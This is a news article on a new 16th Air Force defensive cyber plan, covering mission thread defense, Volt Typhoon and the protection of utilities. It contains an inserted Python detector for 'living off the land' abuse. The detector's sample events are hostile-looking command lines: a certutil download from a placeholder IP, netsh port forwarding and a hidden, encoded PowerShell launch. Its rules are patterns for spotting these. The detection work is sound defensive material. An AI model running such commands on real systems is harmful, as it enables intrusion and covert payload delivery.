
To ‘harmonize’ better: Air Force developing new defensive cyber campaign plan

AFA 2025 — The Air Force’s primary cyber unit is developing a new strategy to better synchronize the work of different groups of cyber defenders, with a particular focus on critical infrastructure and networks, according to the unit’s commander.
“Prior to this, we’ve always kind of looked at them [cybersecurity teams] in separate missions, but they’re really doing the same thing in a different way. We want to harmonize that better,” Lt. Gen. Thomas Hensley, commander of 16th Air Force, said during a panel presentation at the annual Air and Space Forces Association conference at National Harbor, Md.
Currently, cyber defense missions are undertaken by at least two different sets of teams. There are the local defenders, known as cybersecurity service providers or CSSPs, which perform persistent defense of systems. Then there are cyber protection teams, defensive teams focused on hunting adversaries within the network. They have been described as cyber SWAT teams that have specialized kits to eradicate adversary intrusions on networks.
The move for greater harmonization between the two groups, a spokesperson for the 16th said, came out of work the 16th has already done on what they called “mission thread defense.” That refers to an overarching strategy and process flow of information and focuses on protecting critical operational sequences that can span multiple systems and components — to include hardware, software, open vulnerabilities, programmable logic controllers, data dependencies, subsystems and architecture.
“In the increasingly complex and competitive global security environment, mission thread defense protects our systems from any cyber threats, disruptions, and failures at any time. It ensures that essential capabilities, [such as] things that keep America safe, remain functional even under attack, protecting both our homeland and operational success by focusing on endurance and integrity of mission-critical operations,” the spokesperson said. “Mission thread defense safeguards critical operations from the beginning to the end of a mission. It enhances system resiliency, mitigates threats, and safeguards steady operations even under cyberattack or system failure.”
Base Defense And Public Utilities
Historically, the military has focused its defense on Internet Protocol-based networks, but in the age of countless Internet-of-Things devices and digitally maintained critical infrastructure, the threat landscape has widened dramatically.
Volt Typhoon, for instance, was purported Chinese malware discovered inside US critical infrastructure using a technique in the cybersecurity world dubbed “living off the land,” which means the intruder uses legitimate tools already present on the system for malicious purposes rather than introducing recognizable malware. What has particularly alarmed officials regarding Volt Typhoon is the paradigm shift of Chinese threats moving from espionage and intellectual property theft to holding critical infrastructure at risk, likely to thwart a US mobilization response to Chinese activity in the Pacific.
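Because “living off the land” activity uses binaries that are legitimately on every host, defenders cannot alert on the tool itself; they have to look at how it was invoked and by what. The following Python detector is an added illustration written for this page (it is not code from the article, 16th Air Force, or any vendor). It runs over a handful of constructed process-creation events in a simplified, hypothetical EDR-like shape and flags built-in tools that are launched with download, port-forwarding or hidden-execution arguments, or that are spawned by a user application such as a mail client. The specific tool names, argument patterns and parent lists are illustrative assumptions, not an exhaustive rule set.

```python
import re

# Constructed process-creation events (hypothetical sample data, not telemetry
# from the article). Each event is one process start as an EDR might record it.
SAMPLE_EVENTS = [
    {"pid": 101, "image": "cmd.exe", "parent": "explorer.exe",
     "cmdline": "cmd.exe /c dir C:\\Users"},
    {"pid": 102, "image": "certutil.exe", "parent": "winword.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.txt"},
    {"pid": 103, "image": "netsh.exe", "parent": "cmd.exe",
     "cmdline": "netsh interface portproxy add v4tov4 listenport=9999 connectaddress=10.0.0.7"},
    {"pid": 104, "image": "powershell.exe", "parent": "outlook.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QQBCAEMA"},  # constructed, not a real payload
    {"pid": 105, "image": "ipconfig.exe", "parent": "cmd.exe",
     "cmdline": "ipconfig /all"},
    {"pid": 106, "image": "certutil.exe", "parent": "mmc.exe",
     "cmdline": "certutil.exe -store my"},
]

# Built-in tools whose mere presence is normal; only the argument patterns below
# are worth an alert. Illustrative rules, assumed for this example.
ARGUMENT_RULES = [
    ("certutil.exe", re.compile(r"-urlcache|-decode", re.I),
     "certificate utility used to download or decode a file"),
    ("netsh.exe", re.compile(r"\bportproxy\b", re.I),
     "network shell used to configure port forwarding"),
    ("powershell.exe", re.compile(r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden", re.I),
     "PowerShell launched hidden or with an encoded command"),
]

# Interactive user applications that should not be spawning shells or admin tools.
USER_APP_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "msedge.exe", "chrome.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
WATCHED_TOOLS = {tool for tool, _, _ in ARGUMENT_RULES}


def classify(event):
    """Return the reasons (possibly none) that one process event looks like
    living-off-the-land abuse: suspicious arguments and/or an abnormal parent."""
    reasons = []
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmdline = event["cmdline"]

    # Content rule: a legitimate tool driven with arguments it rarely needs in normal use.
    for tool, pattern, description in ARGUMENT_RULES:
        if image == tool and pattern.search(cmdline):
            reasons.append(description)

    # Context rule: a shell or admin tool whose parent is a document/mail/browser app.
    if parent in USER_APP_PARENTS and (image in SHELLS or image in WATCHED_TOOLS):
        reasons.append(f"system tool spawned by user application {parent}")

    return reasons


def detect_lotl(events):
    """Run every event through classify() and return one alert per flagged process."""
    alerts = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            alerts.append({"pid": ev["pid"], "image": ev["image"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_lotl(SAMPLE_EVENTS):
        print(alert["pid"], alert["image"], "; ".join(alert["reasons"]))
```

The two rule types deliberately stay separate: the argument patterns catch a tool being used in an unusual way, while the parent check catches a normal-looking invocation arriving from an abnormal place. Event 106 shows why both are needed: certutil run from a management console with `-store` is routine and produces no alert, whereas the same binary fetching a file from a document editor (event 102) trips both rules.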
Part of the issue is many of these critical infrastructure systems are owned and operated by public utilities, not the US government, even on military bases.
“Looking at the base defense itself, we can do all that we can to defend those bases, but realize that those bases rely on public utilities,” Hensley said. “If those public utilities are attacked, we’ll have a week, maybe two weeks, of generator power to keep the missions going, but then that’s it. We’re out. How do we protect the public utilities that are feeding the bases so that we can continue to fight?”
He explained the Air Force is working through several cooperative research and development agreements with public utility companies at a variety of strategic locations and bases to help improve defenses and partnership with the private sector.
Some include intelligence sharing to inform utilities of adversary activity in their networks, others involve sharing best practices to eradicate adversaries, and some more sensitive agreements allow the Air Force to put sensors on utility systems for persistent monitoring.